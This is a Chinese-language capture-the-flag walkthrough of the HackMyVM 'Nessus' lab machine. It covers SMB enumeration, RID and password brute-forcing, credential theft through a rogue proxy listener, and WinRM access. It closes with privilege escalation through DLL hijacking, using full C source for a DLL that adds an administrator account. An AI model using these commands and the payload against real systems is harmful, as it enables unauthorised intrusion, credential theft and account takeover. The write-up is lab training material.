27.Nessus
1. 基本信息^toc
2. 信息收集
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# fping -aqg 192.168.56.0/24
192.168.56.2
192.168.56.6
192.168.56.156
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# fscan -h 192.168.56.156
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.56.156:445 open
192.168.56.156:139 open
192.168.56.156:135 open
192.168.56.156:8834 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.56.156 WORKGROUP\NESSUS
[*] NetInfo
[*]192.168.56.156
[->]Nessus
[->]192.168.56.156
[*] WebTitle https://192.168.56.156:8834 code:200 len:1217 title:Nessus
已完成 4/4
开了一个网页。尝试访问 https://192.168.56.156:8834
这就是 Nessus
3. SMB 空会话检测
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# smbmap -u anonymous -H 192.168.56.156
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.56.156:445 Name: 192.168.56.156 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Documents READ, WRITE
IPC$ READ ONLY Remote IPC
发现两个共享的目录其中一个还有写权限
Documents IPC$
3.1. SMBcilent 连接
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# smbclient -U 'anonymous' //192.168.56.156/IPC$
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# smbclient -U 'anonymous' //192.168.56.156/Documents
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Nov 24 14:01:18 2024
.. D 0 Sat Oct 19 13:08:23 2024
desktop.ini AHS 402 Sun Jun 16 01:54:33 2024
My Basic Network Scan_hwhm7q.pdf A 122006 Sat Oct 19 06:19:59 2024
My Music DHSrn 0 Sun Jun 16 01:54:27 2024
My Pictures DHSrn 0 Sun Jun 16 01:54:27 2024
My Videos DHSrn 0 Sun Jun 16 01:54:27 2024
Web Application Tests_f6jg9t.pdf A 136025 Sat Oct 19 06:20:14 2024
12942591 blocks of size 4096. 10637803 blocks available
smb: \> get "My Basic Network Scan_hwhm7q.pdf"
getting file \My Basic Network Scan_hwhm7q.pdf of size 122006 as My Basic Network Scan_hwhm7q.pdf (6619.2 KiloBytes/sec) (average 6619.2 KiloBytes/sec)
smb: \> get "Web Application Tests_f6jg9t.pdf"
getting file \Web Application Tests_f6jg9t.pdf of size 136025 as Web Application Tests_f6jg9t.pdf (7813.9 KiloBytes/sec) (average 7199.5 KiloBytes/sec)
这里文件都是有空格的。读取的时候记得加上双引号包起来
3.2. Nessus 报告检测
下载的两个 pdf 文件里面是 Nessus 的检测报告,
这里看着有一大堆洞。但我先不考虑去利用他,因为我不会
4. RID-bruteforce
靶机开放了 135(RPC 服务)与 445(SMB 服务) 而且还允许 SMB 匿名访问
那么我们就可以进行 RID 枚举爆破出域内用户信息
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# crackmapexec smb 192.168.56.156 -u 'anonymous' -p '' --rid-brute > rid_bruteforce.txt
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# cat rid_bruteforce.txt | grep 'SidTypeUser' | cut -d '\' -f2 | cut -d ' ' -f1 > domain_users.txt
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# cat domain_users.txt
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
nesus
可以发现主机有一个 nesus 用户
5. 检测报告利用
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# exiftool My\ Basic\ Network\ Scan_hwhm7q.pdf
ExifTool Version Number : 12.76
File Name : My Basic Network Scan_hwhm7q.pdf
Directory : .
File Size : 122 kB
File Modification Date/Time : 2024:11:24 13:09:43+08:00
File Access Date/Time : 2024:11:24 13:16:35+08:00
File Inode Change Date/Time : 2024:11:24 13:09:43+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
Linearized : No
Page Count : 5
Profile CMM Type : Little CMS
Profile Version : 2.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2004:08:13 12:18:06
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Little CMS
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 7fb30d688bf82d32a0e748daf3dba95d
Device Mfg Desc : lcms generated
Profile Description : sRGB
Device Model Desc : sRGB
Media White Point : 0.95015 1 1.08826
Red Matrix Column : 0.43585 0.22238 0.01392
Blue Matrix Column : 0.14302 0.06059 0.71384
Green Matrix Column : 0.38533 0.71704 0.09714
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Chromaticity Channels : 3
Chromaticity Colorant : Unknown
Chromaticity Channel 1 : 0.64 0.33
Chromaticity Channel 2 : 0.3 0.60001
Chromaticity Channel 3 : 0.14999 0.06
Profile Copyright : no copyright, use freely
XMP Toolkit : Image::ExifTool 12.76
Date : 2024:10:18 15:10:05+02:00
Format : application/pdf
Language : x-unknown
Author : Jose
PDF Version : 1.4
Producer : Apache FOP Version 2.8
Create Date : 2024:10:18 15:10:05+02:00
Creator Tool : Apache FOP Version 2.8
Metadata Date : 2024:10:18 15:10:05+02:00
Page Mode : UseOutlines
Creator : Apache FOP Version 2.8
这里获取到了作者是 Jose
这可能是 nessus 的用户因为他不在系统用户当中
6. Nessus 爆破
抓包用 jose 作为用户名进行爆破
POST sessio/n HTTP/1.1
Host: 192.168.56.156:8834
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
X-API-Token: b5c724c0-00ce-4710-9794-59362a41137f
Content-Length: 39
Origin: https://192.168.56.156:8834
Connection: keep-alive
Referer: https://192.168.56.156:8834/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"username":"jose","password":"123456"}
ffuf 爆破
ffuf -X POST -u 'https://192.168.56.156:8834/session' -d {"username":"jose","password":"FUZZ"}' -w /usr/share/wordlists/rockyou.txt
成功爆破出密码是
tequiero
登录后台在 ProxyServer 这里可以看到密码
f12 看一下密码
发现密码是 ``
6.1. 代理获取密码
我们修改这个Host 与 ip 改成我们kali的。
并修改 Auth Method 改成 BASIC
然后kali监听,在点击 Test Proxy Server 这样可以获取到密码
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.56.6] from (UNKNOWN) [192.168.56.156] 49758
CONNECT plugins.nessus.org:443 HTTP/1.1
Proxy-Authorization: Basic bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
Host: plugins.nessus.org
Connection: keep-Alive
User-Agent: Nessus/10.7.3
Content-Length: 0
Proxy-Connection: Keep-Alive
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# echo 'bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==' |base64 -d
nesus:Z#JuXH$ph-;v@,X&mV)
6.2. winrm连接
获取到 nesus 用户的密码 Z#JuXH$ph-;v@,X&mV)
之前进行 rid-brute 时可以发现 nesus 是系统的一个用户
我们尝试利用这个用户进行 winrm 连接
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# evil-winrm -i 192.168.56.156 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nesus\Documents>
成功连接
7. dll注入
看下当前用户的权限
*Evil-WinRM* PS C:\Users\nesus> whoami /all
USER INFORMATION
----------------
User Name SID
============ ============================================
nessus\nesus S-1-5-21-2986980474-46765180-2505414164-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
没有什么可以利用的。
7.1. 提权检测
上传winpeas.exe 检测一下
*Evil-WinRM* PS C:\Users\nesus\Documents> upload ../../../../../home/winpeas/winPEASx64.exe
Info: Uploading /home/kali/hmv/Nessus/../../../../../home/winpeas/winPEASx64.exe to C:\Users\nesus\Documents\winPEASx64.exe
*Evil-WinRM* PS C:\Users\nesus\Documents> cmd /c 'winPEASx64.exe cmd > output.txt'
^
^C
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# evil-winrm -i 192.168.56.156 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nesus\Documents> dir
Directory: C:\Users\nesus\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/24/2024 9:21 PM 74535 output.txt
-a---- 11/24/2024 9:18 PM 9842176 winPEASx64.exe
*Evil-WinRM* PS C:\Users\nesus\Documents> download output.txt
Info: Downloading C:\Users\nesus\Documents\output.txt to output.txt
Info: Download successful!
检测发现nessus存在dll注入
Tenable Nessus(Tenable, Inc. - Tenable Nessus)["C:\Program Files\Tenable\Nessus\nessus-service.exe"] - Autoload
File Permissions: nesus [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files\Tenable\Nessus (nesus [AllAccess])
Tenable Nessus Network Security Scanner
==> C:\Program Files\Tenable\Nessus\.winperms (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\fips.dll (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\icudt73.dll (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\icuuc73.dll (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\legacy.dll (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\License.rtf (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\nasl.exe (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\ndbg.exe (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\Nessus Web Client.url (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\nessus-service.exe (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\nessuscli.exe (nesus [AllAccess])
==> C:\Program Files\Tenable\Nessus\nessusd.exe (nesus [AllAccess])
7.2. dll制作
这里我利用作者的代码生成一个用于新建管理员的dll
#include <stdlib.h>
#include <windows.h>
// COMPILE
// x86_64-w64-mingw32-gcc adduser.c --shared -o adduser.dll
BOOL APIENTRY DllMain(
HANDLE hModule, // Handle to DLL module
DWORD ul_reason_for_call, // Reason for calling function
LPVOID lpReserved) // Reserved
{
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system("net user admin admin /add");
i = system("net localgroup administrators admin /add");
i = system("net localgroup 'remote management' admin /add");
i = system("net localgroup 'remote desktop' admin /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
编译
C:\Users\yu>x86_64-w64-mingw32-gcc C:\Users\yu\Desktop\admin.c --shared -o admin.dll
替换名字
C:\Program Files\Tenable\Nessus\fips.dll (nesus [AllAccess])
C:\Program Files\Tenable\Nessus\icudt73.dll (nesus [AllAccess])
C:\Program Files\Tenable\Nessus\icuuc73.dll (nesus [AllAccess])
C:\Program Files\Tenable\Nessus\legacy.dll (nesus [AllAccess])
随便找一个替换即可
*Evil-WinRM* PS C:\program files\tenable\nessus> mv fips.dll fips_original.dll
*Evil-WinRM* PS C:\program files\tenable\nessus> mv admin.dll fips.dll
重启靶机
尝试使用添加的用户登录
┌──(root㉿kali)-[/home/kali/hmv/Nessus]
└─# evil-winrm -i 192.168.56.156 -u admin -p 'admin'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\admin\Documents>
成功登录。管理员用户运行cs后门上线拿flag即可